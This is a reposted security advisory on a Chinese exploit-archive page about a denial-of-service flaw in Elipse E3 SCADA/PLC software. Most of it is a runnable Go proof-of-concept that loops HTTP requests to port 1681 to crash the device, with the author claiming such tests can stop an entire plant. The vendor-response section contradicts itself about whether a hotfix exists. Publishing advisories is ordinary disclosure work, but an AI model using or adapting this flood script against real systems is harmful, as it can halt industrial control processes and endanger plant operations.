首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Elipse E3 Scada PLC Denial Of Service
来源:firebitsbr.wordpress.com 作者:Firebits 发布时间:2014-07-16  
VSLA Security Advisory FIRE-SCADA-DOS-2013-001:
Http DoS Requests Flooding Crash Device Vulnerabilities Elipse E3 Scada PLC.

LEVEL: EXTREME
In our tests authorized by the customer, we can stop the entire plant.

Published: 10/29/2013
Version: 1.0

Vendor: Elipse (http://www.elipse.com.br/port/index.aspx)
Product: Elipse E3 (http://www.elipse.com.br/port/e3.aspx)
Version affected: 3.x and prior

Product description:
Elipse E3 is a proprietary software.
The E3 is a system of supervision and control processes designed to meet
the current requirements of connectivity, flexibility and reliability,
making it ideal for use in critical systems (SCADA PLC).

Credit: Mauro Risonho de Paula Assumpção aka firebits

Finding 1: Http DoS Requests Flooding Crash Device Vulnerabilities by
'index.html' page.
CVE: CVE-2011-4899

Proof of Concept:
Exploit:

// Exploit Http DoS Request for SCADA ATTACK Elipse 3
// Mauro Risonho de Paula Assumpção aka firebits
// mauro.risonho@gmail.com
// 29-10-2013 11:42
// Hard lock Dll crash in Windows 2003 SP2 + 20 requests connections
// exploit in Golang (golang.com) C Google
// Exploit Devel in Fedora:
// sudo yum install golang -y
// go run Http-DoS-Request-SCADA-ATTACK-rev1.go


// Exploit Http-DoS-Request-SCADA-ATTACK-rev1.go
package main

import (
    "fmt"
    "io/ioutil"
    "log"
    "net/http"
)

func main() {
    count := 1
//    fmt.Println ("")
//    fmt.Println ("   _____.__              ___.   .__  __           ")
//    fmt.Println (" _/ ____\__|______   ____\_ |__ |__|/  |_  ______ ")
//    fmt.Println (" \   __\|  \_  __ \_/ __ \| __ \|  \   __\/  ___/ ")
//    fmt.Println (" |  |  |  ||  | \/\  ___/| \_\ \  ||  |  \___ \  ")
//    fmt.Println (" |__|  |__||__|    \___  >___  /__||__| /____  > ")
//    fmt.Println ("                       \/    \/              \/  ")
//    fmt.Println ("                     bits on fire. ")
    fmt.Println ("Exploit Http DoS Request for SCADA ATTACK Elipse 3")
    fmt.Println ("Mauro Risonho de Paula Assumpção aka firebits")
    fmt.Println ("29-10-2013 11:42")
    fmt.Println ("mauro.risonho@gmail.com")
    fmt.Println ("Hard lock Dll crash in Windows 2003 SP2 + ")
    fmt.Println ("20 requests connections per second")

    for {
        count += count
        //set ip http://192.168.0.1:1681/index.html ->
        // Elipse 3 http://<ip-elipse4><port listen: default 1681>

        fmt.Println ("Exploit Http DoS Request for SCADA ATTACK Elipse 3")
        fmt.Println ("Mauro Risonho de Paula Assumpção aka firebits")
        fmt.Println ("29-10-2013 11:42")
        fmt.Println ("mauro.risonho@gmail.com")
        fmt.Println ("Hard lock Dll crash in Windows 2003 SP2 + ")
        fmt.Println ("20 requests connections")

        fmt.Println ("Connected Port 1681...Testing")
        fmt.Println ("Counter Loops: ", count)

        res, err := http.Get("http://192.168.0.1:1681/index.html")
        if err != nil {
            log.Fatal(err)
        }
            robots, err := ioutil.ReadAll(res.Body)
            res.Body.Close()
            if err != nil {
            log.Fatal(err)
        }
        fmt.Printf("%s", robots)
    }
}

Crash 20 Requests Paralels

Vendor Response:
Due to the fact that the component in question is an installation script,
the vendor has stated that the attack surface is too small to warrant
a fix:

"We would be possible for us to communicate the details of the test, so
we can arrange a hotfix."

VSLA Virtual Security Labs Anywhere recommends installing the hotfix,
hardware/software to be putting in a production environment.

Remediation Steps:
No official fix for these issues will be released for the Elipse.
However, administrators can mitigate these issues defining rules within
a web application firewall (WAF) solution.

Vendor Communication Timeline:
10/24/2013 - Vulnerability disclosed
10/29/2013 - Confirmation to release vulnerabilities
? - Advisory published


References
1. http://www.elipse.com.br/port/e3.aspx


About VSLA Virtual Security Labs Anywhere:
VSLA Virtual Security Labs Anywhere is a research blog on security
the information.
firebitsbr.wordpress.com

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. VSLA Virtual Security Labs Anywhere disclaims all
warranties, either express or implied, including the warranties of
merchantability and fitness for a particular purpose. In no event shall
VSLA Virtual Security Labs Anywhere or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
VSLA Virtual Security Labs Anywhere or its suppliers have been advised
of the possibility of such damages. Some states do not allow the
exclusion or limitation of liability for consequential or incidental
damages so the foregoing limitation may not apply.



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·HP Data protector manager 8.10
·Oracle VirtualBox Guest Additi
·D-Link info.cgi POST Request B
·Browserify 4.2.0 Remote Comman
·D-Link HNAP Request Remote Buf
·Wordpress WPTouch Authenticate
·D-Link Unauthenticated UPnP M-
·Boat Browser 8.0 and 8.0.1 - R
·Dell Sonicwall Scrutinizer 11.
·Node Browserify 4.2.0 - Remote
·Flash "Rosetta" JSONP GET/POST
·NTP Amplification Denial Of Se
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved